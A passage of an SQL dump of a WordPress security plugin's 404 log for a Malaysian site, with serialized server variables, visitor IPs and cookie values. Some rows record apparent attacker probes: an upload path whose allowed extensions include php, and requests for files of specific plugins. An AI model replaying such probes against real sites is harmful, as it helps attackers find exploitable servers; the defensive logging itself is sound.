*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-CN\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=04a2235fdd6a4319f3b722e288d6873a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:12:\"HTTP_REFERER\";s:116:\"http://bintara.com.my//www/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image\";s:15:\"HTTP_USER_AGENT\";s:70:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:9:\"dir=image\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:21:\"REDIRECT_QUERY_STRING\";s:9:\"dir=image\";s:19:\"REDIRECT_SCRIPT_URI\";s:98:\"https://bintara.com.my/www/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:19:\"REDIRECT_SCRIPT_URL\";s:76:\"/www/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XajK8pmA1jUkTR6fHyQ36AAAAEM\";s:12:\"REDIRECT_URL\";s:76:\"/www/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:11:\"49.70.47.85\";s:11:\"REMOTE_PORT\";s:5:\"49596\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:98:\"https://bintara.com.my/www/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:10:\"SCRIPT_URL\";s:76:\"/www/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XajK8pmA1jUkTR6fHyQ36AAAAEM\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571343090.7915\";s:12:\"REQUEST_TIME\";s:10:\"1571343090\";}}','notice','2019-10-17 20:11:32','2019-10-17 20:11:31',34931576,36739952,'https://bintara.com.my/www/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image',1,0,'49.70.47.85'),(28242,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:98:\"/sss@333/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:37:\"text/html, application/xhtml+xml, */*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-CN\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=860113780fd7405b00264ea60ebe68fb\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:12:\"HTTP_REFERER\";s:120:\"http://bintara.com.my//sss@333/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image\";s:15:\"HTTP_USER_AGENT\";s:70:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:9:\"dir=image\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:21:\"REDIRECT_QUERY_STRING\";s:9:\"dir=image\";s:19:\"REDIRECT_SCRIPT_URI\";s:102:\"https://bintara.com.my/sss@333/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:19:\"REDIRECT_SCRIPT_URL\";s:80:\"/sss@333/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XajK@vb4yAloRZFRtQOU8AAAAUg\";s:12:\"REDIRECT_URL\";s:80:\"/sss@333/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:11:\"49.70.47.85\";s:11:\"REMOTE_PORT\";s:5:\"49973\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:102:\"https://bintara.com.my/sss@333/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:10:\"SCRIPT_URL\";s:80:\"/sss@333/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XajK@vb4yAloRZFRtQOU8AAAAUg\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571343099.4653\";s:12:\"REQUEST_TIME\";s:10:\"1571343099\";}}','notice','2019-10-17 20:11:42','2019-10-17 20:11:40',34933160,36736168,'https://bintara.com.my/sss@333/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image',1,0,'49.70.47.85'),(28246,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/toughbook-33/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-33/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/toughbook-33/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XajZsmxQCXaLINxK9P7i6QAAANM\";s:12:\"REDIRECT_URL\";s:14:\"/toughbook-33/\";s:11:\"REMOTE_ADDR\";s:13:\"157.55.39.195\";s:11:\"REMOTE_PORT\";s:4:\"8247\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-33/\";s:10:\"SCRIPT_URL\";s:14:\"/toughbook-33/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XajZsmxQCXaLINxK9P7i6QAAANM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571346866.5944\";s:12:\"REQUEST_TIME\";s:10:\"1571346866\";}}','notice','2019-10-17 21:14:29','2019-10-17 21:14:26',34285344,36087272,'https://bintara.com.my/toughbook-33/',1,0,'157.55.39.195'),(28247,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3451.0 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"64164\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XajlLZmA1jUkTR6fHyQ@yQAAAE0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571349805.8968\";s:12:\"REQUEST_TIME\";s:10:\"1571349805\";}}','notice','2019-10-17 22:03:28','2019-10-17 22:03:26',35310936,37113440,'https://bintara.com.my/?page_id=18',1,0,'137.74.4.69'),(28248,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:54:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:55:\"/wp-content/plugins/flow-flow-social-streams/README.txt\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:23:\"en-US,en;q=0.8,ru;q=0.6\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:77:\"https://bintara.com.my/wp-content/plugins/flow-flow-social-streams/README.txt\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:55:\"/wp-content/plugins/flow-flow-social-streams/README.txt\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xajv1-b4yAloRZFRtQOqEQAAAVg\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:77:\"https://bintara.com.my/wp-content/plugins/flow-flow-social-streams/README.txt\";s:19:\"REDIRECT_SCRIPT_URL\";s:55:\"/wp-content/plugins/flow-flow-social-streams/README.txt\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xajv1-b4yAloRZFRtQOqEQAAAVg\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:14:\"185.213.26.165\";s:11:\"REMOTE_PORT\";s:5:\"59113\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:77:\"https://bintara.com.my/wp-content/plugins/flow-flow-social-streams/README.txt\";s:10:\"SCRIPT_URL\";s:55:\"/wp-content/plugins/flow-flow-social-streams/README.txt\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xajv1-b4yAloRZFRtQOqEQAAAVg\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571352535.6943\";s:12:\"REQUEST_TIME\";s:10:\"1571352535\";}}','notice','2019-10-17 22:48:58','2019-10-17 22:48:56',35671800,37474496,'https://bintara.com.my/wp-content/plugins/flow-flow-social-streams/README.txt',1,0,'185.213.26.165'),(28249,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:54:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:58:\"/wp-content/plugins/flow-flow-social-streams/js/streams.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:23:\"en-US,en;q=0.8,ru;q=0.6\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:80:\"https://bintara.com.my/wp-content/plugins/flow-flow-social-streams/js/streams.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:58:\"/wp-content/plugins/flow-flow-social-streams/js/streams.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xajv7-b4yAloRZFRtQOqIgAAAVE\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:80:\"https://bintara.com.my/wp-content/plugins/flow-flow-social-streams/js/streams.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:58:\"/wp-content/plugins/flow-flow-social-streams/js/streams.js\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xajv7-b4yAloRZFRtQOqIgAAAVE\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:15:\"120.236.254.211\";s:11:\"REMOTE_PORT\";s:5:\"51737\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:80:\"https://bintara.com.my/wp-content/plugins/flow-flow-social-streams/js/streams.js\";s:10:\"SCRIPT_URL\";s:58:\"/wp-content/plugins/flow-flow-social-streams/js/streams.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xajv7-b4yAloRZFRtQOqIgAAAVE\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571352559.9671\";s:12:\"REQUEST_TIME\";s:10:\"1571352559\";}}','notice','2019-10-17 22:49:21','2019-10-17 22:49:20',35173168,36978280,'https://bintara.com.my/wp-content/plugins/flow-flow-social-streams/js/streams.js',1,0,'120.236.254.211'),(28250,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:55:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:58:\"/wp-content/plugins/flow-flow-social-streams/js/streams.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:23:\"en-US,en;q=0.8,ru;q=0.6\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=975e17c5d156f435be5b6d26f01c3577\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:80:\"https://bintara.com.my/wp-content/plugins/flow-flow-social-streams/js/streams.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:58:\"/wp-content/plugins/flow-flow-social-streams/js/streams.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xajv@Pb4yAloRZFRtQOqJwAAAUw\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:80:\"https://bintara.com.my/wp-content/plugins/flow-flow-social-streams/js/streams.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:58:\"/wp-content/plugins/flow-flow-social-streams/js/streams.js\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xajv@Pb4yAloRZFRtQOqJwAAAUw\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:14:\"120.78.171.166\";s:11:\"REMOTE_PORT\";s:5:\"56803\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:80:\"https://bintara.com.my/wp-content/plugins/flow-flow-social-streams/js/streams.js\";s:10:\"SCRIPT_URL\";s:58:\"/wp-content/plugins/flow-flow-social-streams/js/streams.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xajv@Pb4yAloRZFRtQOqJwAAAUw\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571352568.3313\";s:12:\"REQUEST_TIME\";s:10:\"1571352568\";}}','notice','2019-10-17 22:49:29','2019-10-17 22:49:28',35174488,36983336,'https://bintara.com.my/wp-content/plugins/flow-flow-social-streams/js/streams.js',1,0,'120.78.171.166'),(28251,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:54:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:53:\"/wp-content/plugins/booking-ultra-pro/js/bup-front.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:23:\"en-US,en;q=0.8,ru;q=0.6\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; 